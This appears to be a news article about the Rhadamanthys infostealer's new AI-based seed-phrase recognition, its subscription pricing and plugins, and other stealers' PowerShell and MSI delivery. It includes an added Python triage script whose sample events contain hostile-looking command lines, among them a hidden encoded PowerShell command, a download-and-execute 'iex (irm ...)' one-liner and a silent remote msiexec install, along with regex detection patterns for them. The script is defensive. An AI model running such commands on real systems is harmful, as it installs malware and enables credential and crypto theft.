Man
Professional
Criminals are actively mastering new techniques, creating non-standard malware.
Researchers from Recorded Future have discovered that the threat actors behind the Rhadamanthys malware have added new artificial intelligence (AI)-based capabilities. A new feature called Seed Phrase Image Recognition allows software to extract crypto wallet seed phrases from images, posing a serious threat to cryptocurrency users.
In other words, the Rhadamanthys malware is now able to identify images containing crypto wallet seed phrases on the victim's device and send them to the command and control server for further exploitation. This capability increases the risk of theft of funds from cryptocurrency wallets.
Launched in September 2022, Rhadamanthys has quickly become one of the most powerful infostealers in the malware-as-a-service (MaaS) market. Despite bans on some underground forums, such as Exploit and XSS, the creator of this software, known as "kingcrete", actively promotes it on Telegram, Jabber and TOX.
The software is sold on a subscription basis for $250 per month or $550 for 90 days, which gives attackers access to confidential information: system data, accounts, crypto wallets, browser passwords, cookies and other data located on infected devices. At the same time, the author of Rhadamanthys actively complicates the analysis of his software in sandboxes and other research environments.
The new version 0.7.0, released in June this year, is a significant improvement over version 0.6.0, which was released in February. According to Recorded Future, the author has completely rewritten the client and server software, improved stability, added 30 algorithms for hacking crypto wallets, recognition functions for graphics and PDF documents, and expanded text extraction capabilities to detect many saved phrases.
In addition, the ability to install MSI files to bypass security tools on the victim's device has been introduced. Rhadamanthys also supports a plugin system that extends the functionality with keylogger, crypto clipper, and reverse proxy capabilities.
Experts note that the Rhadamanthys Stealer is popular with cybercriminals due to its rapid development and innovative features. Other similar infostealers, such as Lumma, Meduza, StealC, Vidar, and WhiteSnake, have also been updated rapidly, gaining new features such as collecting cookies from the Chrome browser and bypassing recently introduced security mechanisms.
At the same time, other malicious campaigns, such as Amadey, use various social engineering techniques and phishing sites to obtain victims' credentials. Cybercriminals lure users to fake pages and force them to perform certain actions, such as running PowerShell code, to install and run malware.
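The two delivery behaviours mentioned in this post (victims tricked into running PowerShell from a fake page, and MSI installs used to slip past security tools) both leave a trace in process-creation telemetry. The script below is an added illustration of how a defender could triage such events; it is not code from the article, from Recorded Future, or from any of the malware families named. The event lines are constructed for the example and loosely mimic the ParentImage / Image / CommandLine fields of Sysmon Event ID 1; the rule names, the field separator and the indicator lists are assumptions made here.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry). The
# "key=value|key=value" layout is an assumption for this example; field names
# are borrowed from Sysmon Event ID 1. URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\msiexec.exe"
    "|CommandLine=msiexec /i http://example.invalid/update.msi /qn",
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\msiexec.exe"
    "|CommandLine=C:\\Windows\\System32\\msiexec.exe /V",
    "ParentImage=C:\\Program Files\\Example\\Code.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -NoLogo -File build.ps1",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -NoProfile iex (irm http://example.invalid/x)",
]

# Command-line indicators commonly seen when a user is lured into pasting a
# one-liner: encoded commands, hidden windows, and download-then-execute idioms.
POWERSHELL_SUSPICIOUS = re.compile(
    r"(-e(nc(odedcommand)?)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"downloadstring|invoke-webrequest|\birm\b|\biwr\b)",
    re.IGNORECASE,
)

# msiexec pulling its package straight from a URL rather than a local path.
REMOTE_MSI = re.compile(r"\bmsiexec(\.exe)?\b.*https?://", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed 'key=value|key=value' event line into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both separators)."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules that match one event."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    # PowerShell spawned directly by the shell (Run dialog / double-click) with
    # hidden-window, encoded or download indicators: typical of a pasted lure.
    if image == "powershell.exe" and parent == "explorer.exe" and POWERSHELL_SUSPICIOUS.search(cmd):
        hits.append("user-launched-powershell-with-suspicious-flags")
    # msiexec installing a package fetched from a URL.
    if image == "msiexec.exe" and REMOTE_MSI.search(cmd):
        hits.append("msiexec-install-from-url")
    return hits


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run every rule over every line; return (line index, rule name) pairs."""
    findings: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        for rule in classify(parse_event(line)):
            findings.append((idx, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Events 2 and 3 are deliberately benign (a service-spawned msiexec and a PowerShell script started by a developer tool) so that the parent-process condition, not just the command-line pattern, does the filtering; in a real pipeline these rules would be tuned against the environment's own baseline before alerting.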
Experts warn that constant updates and new tactics used by hackers pose serious risks to internet and cryptocurrency users, reinforcing the need for robust cyber protection and vigilance.
Source